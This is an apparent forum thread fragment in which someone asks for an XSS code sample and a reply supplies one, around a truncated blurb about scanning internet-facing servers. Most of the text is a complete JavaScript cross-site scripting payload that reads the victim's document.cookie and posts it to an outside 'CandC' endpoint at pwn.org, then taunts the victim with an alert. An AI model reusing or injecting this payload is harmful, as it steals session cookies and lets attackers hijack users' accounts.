XSS....
Code sample example please...............?
If we have internet-facing web servers (and other types of server, for that matter) we care about how vulnerable they are to attack. There are loads of services out there that you can use to probe your public-facing systems, and they'll tell you loads of useful stuff about why they might be vulnerable. But of course they're only …
<script type="text/javascript">
function SlurpData() {
var d = document.cookie;
var params = JSON.stringify({ data: d });
var xmlHttp = new XMLHttpRequest();
xmlHttp.onreadystatechange = function () {
if (xmlHttp.readyState == 4 && xmlHttp.status == 200) {
alert("All Your Sessions Are Belongs to me!");
}
}
xmlHttp.open("post", "www.pwn.org/CandC.asmx/Slurp", true);
xmlHttp.setRequestHeader("content-type", "application/json; charset=utf-8");
xmlHttp.setRequestHeader("Content-length", params.length);
xmlHttp.setRequestHeader("Connection", "close");
xmlHttp.send(params);
}
SlurpData();
</script>
This post has been deleted by its author